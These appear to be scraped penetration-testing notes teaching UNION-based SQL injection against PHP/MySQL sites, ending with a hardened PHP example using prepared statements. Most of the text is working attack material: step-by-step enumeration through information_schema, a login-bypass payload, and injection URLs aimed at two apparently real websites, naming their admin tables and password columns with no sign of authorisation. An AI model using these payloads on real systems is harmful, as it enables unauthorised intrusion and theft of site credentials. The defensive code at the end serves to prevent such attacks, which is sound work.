Penetration Test 2

Source: Internet
Author: User
Tags php language mysql injection

Scripting language: PHP language basics tutorial (comments, input debugging, receiving and processing input). SQL statement tutorial (query, insert, modify/update, etc.). Example: writing an SQL injection test page.

PHP+MySQL injection (part 1)

How to see the submission method: in Firefox, right-click the page and choose "Inspect Element"; the request is shown under the Network tab.

To prevent SQL injection, change the corresponding statement so that the parameter is first checked with is_numeric(), which only allows a number to be entered.

Database commands (from the command line):
  show databases;               show the database names
  show tables;                  show the table names
  select * from <table name>;   show the data in that table

Steps:
  1. Find a page that takes a parameter.
  2. Enter an invalid parameter and see whether the page errors; if it errors, there is an injection point.
  3. Guess the number of fields with an ORDER BY statement, changing the number after BY (binary search); the number at which the page starts to error marks the field count.
  4. For ASP injection this step is skipped (Access has no database name, so the table name, e.g. admin, is guessed directly). For PHP injection the database name is dumped first. If the statement does not produce an error, add "and 1=111" so that the original query returns nothing.
  5. The column number that appears on the page is replaced with these queries:
       database()              database name
       user()                  database user
       version()               database version
       @@version_compile_os    server operating system
  6. Query the table names: query the table names under the database name from information_schema.tables (condition: table_schema=0x726f6f74, the database is named root). information_schema.tables is the table in the information_schema database that records the table names of all databases. Specific statement:
       http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x726f6f74
     (0x726f6f74 is the hexadecimal encoding of the database name). group_concat() dumps all the table names at once. Then query the column names under the table name yzsoumember from information_schema.columns, the table that records the column names of all databases. Specific example:
       http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x797a736f756d656d626572
     (0x797a736f756d656d626572 is the hexadecimal encoding of the table name).
  7. The last step is the same as ASP injection: once the table name and column name are known, enter the statement that dumps the user name and password.

Access data hierarchy:  table name > column name > content
MySQL data hierarchy:   database name > table name > column name > content
  Example: mysql server > databases information_schema, root > table yzsoumember > columns username, password > content

Differences:
  - asp+access: the database is stored in the site directory (can be reached by penetration); file suffixes mdb, asp, asa.
  - php+mysql: the database is stored under the database installation path (not reachable); file suffixes myi, myd, frm.
  - asp+access injection is brute-force guessing; MySQL 5.0 and above has information_schema, which stores the table name and column name information of all databases.
  - database() database name; user() database user; version() database version; @@version_compile_os server operating system.
  - Windows is case insensitive; Linux is case sensitive.

Site examples from the notes:
  http://www.makita.com.cn   database mutia0121, table admin, columns name, adminpass
    http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x6d7574696130313231
    http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x61646d696e
  http://www.wh3z.cn   database hdm1040458_db, table intwho_admin_user, columns user_name, password
    http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=0x68646d313034303435385f6462
    http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=0x696e7477686f5f61646d696e5f75736572

  1. Operations on the two sites   2. Writing the PHP page (phpmyadmin)

Login field injection: the query statement can be changed by entering a specific SQL statement in the login submission field. Input:
  admin' or 1=1)#
The query then becomes
  select user from PHP where (user='admin' or 1=1)#') and (pw='$pass')
Because # is a comment character, everything after it is dropped, leaving
  select user from PHP where (user='admin' or 1=1)
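As an added example (not code from the original notes), the article lookup and login query described above written in PHP with mysqli, first as the concatenated string the notes show, then hardened with the is_numeric()-style check and prepared statements; the table names users and article and their columns are assumptions.

```php
<?php
// Added example, not from the original notes. Assumes a mysqli connection,
// a table "users" with columns user and pw (a password_hash() value), and a
// table "article" with columns id, title, body.

// Vulnerable form of the login query from the notes. With the input
// admin' or 1=1)# the WHERE clause becomes (user='admin' or 1=1)#') and ...
// and everything after # is a comment, so the password is never checked.
function login_vulnerable(mysqli $db, string $user, string $pass): bool {
    $sql = "SELECT user FROM users WHERE (user='$user') AND (pw='$pass')";
    $res = $db->query($sql);
    return $res !== false && $res->num_rows > 0;
}

// Hardened form: the SQL text is fixed and the value travels as a bound
// parameter, so quotes and # in $user are data, not syntax. The password is
// checked in PHP against a stored hash rather than inside the SQL.
function login_safe(mysqli $db, string $user, string $pass): bool {
    $stmt = $db->prepare("SELECT pw FROM users WHERE user = ?");
    $stmt->bind_param("s", $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row !== null && password_verify($pass, $row['pw']);
}

// The id check the notes recommend. is_numeric() alone still accepts
// "1.5" and "1e3", so FILTER_VALIDATE_INT is used to keep exactly integers;
// "5 and 1=111 UNION SELECT ..." fails the check and never reaches MySQL.
function fetch_article(mysqli $db, string $id): ?array {
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        return null;                       // not a plain integer: refuse
    }
    $stmt = $db->prepare("SELECT id, title, body FROM article WHERE id = ?");
    $stmt->bind_param("i", $n);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Usage (needs a live MySQL server; the credentials are placeholders):
// $db = new mysqli("localhost", "DB_USER", "DB_PASS", "DB_NAME");
// var_dump(fetch_article($db, "5 and 1=111 UNION SELECT 1,2,3"));
// var_dump(login_safe($db, "admin' or 1=1)#", "x"));
```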
